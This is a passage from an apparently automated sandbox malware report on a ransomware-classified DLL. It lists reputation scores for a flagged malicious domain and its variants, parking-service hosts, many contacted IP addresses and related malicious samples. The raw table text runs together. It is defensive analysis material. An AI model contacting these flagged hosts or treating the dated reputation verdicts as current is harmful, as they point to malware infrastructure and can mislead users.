                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/100%URL Reputationmalware
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/100%URL Reputationmalware
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com100%URL Reputationmalware
                  https://activity.windows.comr0%URL Reputationsafe
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://dynamic.t0%URL Reputationsafe
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJ0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe
                  http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/p100%Avira URL Cloudmalware
                  http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/p15%VirustotalBrowse
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/l100%Avira URL Cloudmalware
                  http://www.iuqerfsodp99ifjaposdfjhgosurijfaewrwergwff.com/33ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrw0%Avira URL Cloudsafe
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/0100%Avira URL Cloudmalware
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/k100%Avira URL Cloudmalware
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/P100%Avira URL Cloudmalware
                  http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/100%Avira URL Cloudmalware
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.coma0%Avira URL Cloudsafe
                  http://ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20221222-2004-15a5-aec0-299192b1f656100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  77026.bodis.com
                  199.59.243.222
                  truefalse
                    high
                    701602.parkingcrew.net
                    76.223.26.96
                    truefalse
                      high
                      www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                      103.224.212.220
                      truefalseunknown
                      ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                      unknown
                      unknowntrueunknown
                      ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/true
                      • URL Reputation: malware
                      • URL Reputation: malware
                      unknown
                      http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/true
                      • Avira URL Cloud: malware
                      unknown
                      http://ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20221222-2004-15a5-aec0-299192b1f656true
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000F.00000002.319075342.000001BD66040000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000F.00000003.316636238.000001BD66047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319096880.000001BD6604D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/pmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                  • 15%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000F.00000003.316809924.000001BD66041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319083060.000001BD66042000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/0mssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/lmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/kmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000F.00000003.316809924.000001BD66041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319083060.000001BD66042000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.iuqerfsodp99ifjaposdfjhgosurijfaewrwergwff.com/33ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.bingmapsportal.comsvchost.exe, 0000000F.00000002.318886505.000001BD66013000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/Pmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000003.316677637.000001BD66045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.commssecsvr.exe.3.drtrue
                                                    • URL Reputation: malware
                                                    unknown
                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://activity.windows.comrsvchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000002.318886505.000001BD66013000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319065392.000001BD6603D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://%s.xboxlive.comsvchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              low
                                                              https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000003.316636238.000001BD66047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319096880.000001BD6604D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316398895.000001BD6603F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comamssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dynamic.tsvchost.exe, 0000000F.00000003.315727630.000001BD66064000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000F.00000002.319054075.000001BD6603A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.292823147.000001BD66031000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/Pmssecsvr.exe, 00000005.00000002.255951396.0000000000C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                unknown
                                                                                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJmssecsvr.exe, 00000007.00000002.764580086.000000000019C000.00000004.00000010.00020000.00000000.sdmptrue
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000002.319120846.000001BD66058000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.316619808.000001BD66057000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://activity.windows.comsvchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000F.00000003.315952572.000001BD66061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://%s.dnet.xboxlive.comsvchost.exe, 0000000D.00000002.765311771.000002029A43E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      low
                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.319127172.000001BD6605E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000003.316197481.000001BD6605C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          99.90.151.182
                                                                                          unknownUnited States
                                                                                          7018ATT-INTERNET4USfalse
                                                                                          56.66.229.63
                                                                                          unknownUnited States
                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                          179.18.194.208
                                                                                          unknownColombia
                                                                                          22698AVANTELSASCOfalse
                                                                                          87.183.240.9
                                                                                          unknownGermany
                                                                                          3320DTAGInternetserviceprovideroperationsDEfalse
                                                                                          44.107.25.199
                                                                                          unknownUnited States
                                                                                          7377UCSDUSfalse
                                                                                          109.159.246.63
                                                                                          unknownUnited Kingdom
                                                                                          2856BT-UK-ASBTnetUKRegionalnetworkGBfalse
                                                                                          163.118.75.149
                                                                                          unknownUnited States
                                                                                          31967FLTECHUSfalse
                                                                                          39.26.204.126
                                                                                          unknownKorea Republic of
                                                                                          4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                          178.172.159.145
                                                                                          unknownBelarus
                                                                                          48743TELESETBYfalse
                                                                                          141.1.229.182
                                                                                          unknownGermany
                                                                                          1273CWVodafoneGroupPLCEUfalse
                                                                                          191.121.20.212
                                                                                          unknownBrazil
                                                                                          26615TIMSABRfalse
                                                                                          16.218.32.149
                                                                                          unknownUnited States
                                                                                          unknownunknownfalse
                                                                                          211.240.29.80
                                                                                          unknownKorea Republic of
                                                                                          4663ELIMNET-AS-KRELIMNETINCKRfalse
                                                                                          209.2.122.146
                                                                                          unknownUnited States
                                                                                          7029WINDSTREAMUSfalse
                                                                                          207.210.243.116
                                                                                          unknownUnited States
                                                                                          36024AS-TIERP-36024USfalse
                                                                                          205.215.112.48
                                                                                          unknownUnited States
                                                                                          17PURDUEUSfalse
                                                                                          120.75.43.49
                                                                                          unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                                                                                          61.190.17.253
                                                                                          unknownChina
                                                                                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                          46.185.222.159
                                                                                          unknownJordan
                                                                                          8376JordanDataCommunicationsJOfalse
                                                                                          44.90.68.1
                                                                                          unknownUnited States
                                                                                          7377UCSDUSfalse
                                                                                          103.225.99.97
                                                                                          unknownIndia
                                                                                          17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse
                                                                                          62.222.206.143
                                                                                          unknownIreland
                                                                                          8918CARRIER1-ASIEfalse
                                                                                          167.172.37.5
                                                                                          unknownUnited States
                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                          105.16.49.223
                                                                                          unknownMauritius
                                                                                          37100SEACOM-ASMUfalse
                                                                                          206.160.189.32
                                                                                          unknownUnited States
                                                                                          1239SPRINTLINKUSfalse
                                                                                          53.65.176.158
                                                                                          unknownGermany
                                                                                          31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                                                                          18.49.204.214
                                                                                          unknownUnited States
                                                                                          3MIT-GATEWAYSUSfalse
                                                                                          18.74.78.152
                                                                                          unknownUnited States
                                                                                          3MIT-GATEWAYSUSfalse
                                                                                          193.170.116.128
                                                                                          unknownAustria
                                                                                          1853ACONETACOnetBackboneATfalse
                                                                                          64.71.58.126
                                                                                          unknownUnited States
                                                                                          3064AFFINITY-FTLUSfalse
                                                                                          113.22.220.191
                                                                                          unknownViet Nam
                                                                                          18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                          177.169.140.222
                                                                                          unknownBrazil
                                                                                          26599TELEFONICABRASILSABRfalse
                                                                                          77.95.106.209
                                                                                          unknownSweden
                                                                                          3246TDCSONGTele2BusinessTDCSwedenSEfalse
                                                                                          16.194.171.182
                                                                                          unknownUnited States
                                                                                          unknownunknownfalse
                                                                                          3.61.212.228
                                                                                          unknownUnited States
                                                                                          8987AMAZONEXPANSIONGBfalse
                                                                                          222.5.162.35
                                                                                          unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                                                                          193.184.231.66
                                                                                          unknownFinland
                                                                                          719ELISA-ASHelsinkiFinlandEUfalse
                                                                                          117.117.132.113
                                                                                          unknownChina
                                                                                          4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                                                                                          106.46.28.91
                                                                                          unknownChina
                                                                                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                          176.75.194.109
                                                                                          unknownNorway
                                                                                          2119TELENOR-NEXTELTelenorNorgeASNOfalse
                                                                                          72.33.18.64
                                                                                          unknownUnited States
                                                                                          59WISC-MADISON-ASUSfalse
                                                                                          87.5.27.190
                                                                                          unknownItaly
                                                                                          3269ASN-IBSNAZITfalse
                                                                                          205.179.236.169
                                                                                          unknownUnited States
                                                                                          18566MEGAPATH5-USfalse
                                                                                          102.158.48.81
                                                                                          unknownTunisia
                                                                                          37705TOPNETTNfalse
                                                                                          102.253.214.82
                                                                                          unknownSouth Africa
                                                                                          5713SAIX-NETZAfalse
                                                                                          67.29.238.196
                                                                                          unknownUnited States
                                                                                          202818LEVEL3COMMUNICATIONSFRfalse
                                                                                          95.61.64.1
                                                                                          unknownSpain
                                                                                          12430VODAFONE_ESESfalse
                                                                                          33.193.194.131
                                                                                          unknownUnited States
                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                          34.70.94.165
                                                                                          unknownUnited States
                                                                                          15169GOOGLEUSfalse
                                                                                          113.78.218.22
                                                                                          unknownChina
                                                                                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                          68.215.49.177
                                                                                          unknownUnited States
                                                                                          6389BELLSOUTH-NET-BLKUSfalse
                                                                                          129.138.200.195
                                                                                          unknownUnited States
                                                                                          17153NMT-ASUSfalse
                                                                                          202.186.89.114
                                                                                          unknownMalaysia
                                                                                          9930TTNET-MYTIMEdotComBerhadMYfalse
                                                                                          112.25.22.74
                                                                                          unknownChina
                                                                                          56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                                                                                          121.6.57.26
                                                                                          unknownSingapore
                                                                                          9506SINGTEL-FIBRESingtelFibreBroadbandSGfalse
                                                                                          73.141.190.235
                                                                                          unknownUnited States
                                                                                          7922COMCAST-7922USfalse
                                                                                          160.224.33.150
                                                                                          unknownAngola
                                                                                          11259ANGOLATELECOMAOfalse
                                                                                          155.239.132.215
                                                                                          unknownSouth Africa
                                                                                          5713SAIX-NETZAfalse
                                                                                          217.93.127.169
                                                                                          unknownGermany
                                                                                          3320DTAGInternetserviceprovideroperationsDEfalse
                                                                                          48.247.162.2
                                                                                          unknownUnited States
                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                          202.164.126.3
                                                                                          unknownChina
                                                                                          2516KDDIKDDICORPORATIONJPfalse
                                                                                          207.52.211.228
                                                                                          unknownUnited States
                                                                                          1239SPRINTLINKUSfalse
                                                                                          153.130.213.39
                                                                                          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                                                                          182.102.31.100
                                                                                          unknownChina
                                                                                          4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                                                                          25.151.185.143
                                                                                          unknownUnited Kingdom
                                                                                          7922COMCAST-7922USfalse
                                                                                          67.14.103.207
                                                                                          unknownUnited States
                                                                                          209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                          8.159.246.246
                                                                                          unknownSingapore
                                                                                          37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                          215.5.247.185
                                                                                          unknownUnited States
                                                                                          721DNIC-ASBLK-00721-00726USfalse
                                                                                          IP
                                                                                          192.168.2.148
                                                                                          192.168.2.149
                                                                                          192.168.2.146
                                                                                          192.168.2.147
                                                                                          192.168.2.140
                                                                                          192.168.2.141
                                                                                          192.168.2.144
                                                                                          192.168.2.145
                                                                                          192.168.2.142
                                                                                          192.168.2.143
                                                                                          192.168.2.159
                                                                                          192.168.2.157
                                                                                          192.168.2.158
                                                                                          192.168.2.151
                                                                                          192.168.2.152
                                                                                          192.168.2.150
                                                                                          192.168.2.155
                                                                                          192.168.2.156
                                                                                          192.168.2.153
                                                                                          192.168.2.154
                                                                                          192.168.2.126
                                                                                          192.168.2.127
                                                                                          192.168.2.124
                                                                                          192.168.2.125
                                                                                          192.168.2.128
                                                                                          192.168.2.129
                                                                                          192.168.2.122
                                                                                          192.168.2.123
                                                                                          192.168.2.120
                                                                                          192.168.2.121
                                                                                          192.168.2.137
                                                                                          192.168.2.138
                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                          Analysis ID:771981
                                                                                          Start date and time:2022-12-22 10:03:18 +01:00
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 11m 23s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Sample file name:xIwkOnjSIa.dll
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:25
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.rans.troj.expl.evad.winDLL@32/8@6/100
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 99.7% (good quality ratio 97.5%)
                                                                                          • Quality average: 87.1%
                                                                                          • Quality standard deviation: 21.1%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 78%
                                                                                          • Number of executed functions: 68
                                                                                          • Number of non-executed functions: 91
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .dll
                                                                                          • Override analysis time to 240s for rundll32
                                                                                          • Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe, backgroundTaskHost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 209.197.3.8, 93.184.221.240
                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          TimeTypeDescription
                                                                                          10:04:13API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                          10:05:35API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                          No context
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          701602.parkingcrew.netViNIRfmQmE.dllGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          Ee3RWj3ID9.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          YB7v7UFV3j.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          B0U3oOhQJu.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          1WImqfBvqH.dllGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          zTg6FfsIq1.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          8ML9vWcUAh.dllGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          e9TfH3jxO1.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          6jtNVDiwz9.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          tkxl2AyS35.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          vcLgaDtq2Y.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          wS1IlhGZ6O.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          DWs0ZsrcWc.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          iH34IwDgCX.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          UKfz9ypQ3N.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          7jLUw8OOEn.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          upCVNgNwCr.dllGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          tNTBg40iVN.exeGet hashmaliciousBrowse
                                                                                          • 13.248.148.254
                                                                                          rRhN2d6O0L.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          gHzphO4pht.exeGet hashmaliciousBrowse
                                                                                          • 76.223.26.96
                                                                                          77026.bodis.comhttps://link-4.info/lmed/it/ips2/?p=200&uclick=h9whhe6o&uclickhash=h9whhe6o-h9whhe6o-yd-0-x9-fnwj-pmfe-a611a5Get hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          https://thyrsi.comGet hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          hWS1qmOL73.dllGet hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          2C3382E9EB5BBBFE86A88F9D8A75557C3F60707AF088C.exeGet hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          6AA0D341CEE633C2783960687C79D951BF270924DF527.exeGet hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          D6EC737D10AFDAF38CAFEDE9FDE045DD3CE7BC72C6EE1.exeGet hashmaliciousBrowse
                                                                                          • 199.59.243.222
                                                                                          72B6DA82C3AA6FAEEE19E842814F77874CAB37B3425CE.exeGet hashmaliciousBrowse
                                                                                          • 199.59.243.220
                                                                                          28D5E4DCAADFBD31A3C06048031BF9070D8A6F81ABEEF.exeGet hashmaliciousBrowse
                                                                                          • 199.59.243.220
                                                                                          GlLHM7paoZ.exeGet hashmaliciousBrowse
                                                                                          • 199.59.242.153
                                                                                          http://blackberry.proGet hashmaliciousBrowse
                                                                                          • 199.59.242.153
                                                                                          http://tyc588888.com/test.txt?.phpGet hashmaliciousBrowse
                                                                                          • 199.59.242.153
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          ATGS-MMD-ASUSmbXvGlj2dR.dllGet hashmaliciousBrowse
                                                                                          • 56.31.105.186
                                                                                          3AnYui60gb.elfGet hashmaliciousBrowse
                                                                                          • 62.200.58.31
                                                                                          gL5vZH3AvK.elfGet hashmaliciousBrowse
                                                                                          • 48.202.215.76
                                                                                          gXjp7HgNea.elfGet hashmaliciousBrowse
                                                                                          • 48.71.229.91
                                                                                          http://112.248.1.185:40780/Mozi.mGet hashmaliciousBrowse
                                                                                          • 34.160.144.191
                                                                                          sTwjz3f1Re.elfGet hashmaliciousBrowse
                                                                                          • 48.87.170.47
                                                                                          d5pBhIakt7.elfGet hashmaliciousBrowse
                                                                                          • 57.135.47.55
                                                                                          RXmAEkggZt.elfGet hashmaliciousBrowse
                                                                                          • 32.93.34.194
                                                                                          spzG7nKtuJ.elfGet hashmaliciousBrowse
                                                                                          • 48.216.35.144
                                                                                          rkLmMQcLCU.elfGet hashmaliciousBrowse
                                                                                          • 32.128.252.177
                                                                                          mPQQqzukqh.elfGet hashmaliciousBrowse
                                                                                          • 32.159.254.138
                                                                                          VAjvBiGvo8.elfGet hashmaliciousBrowse
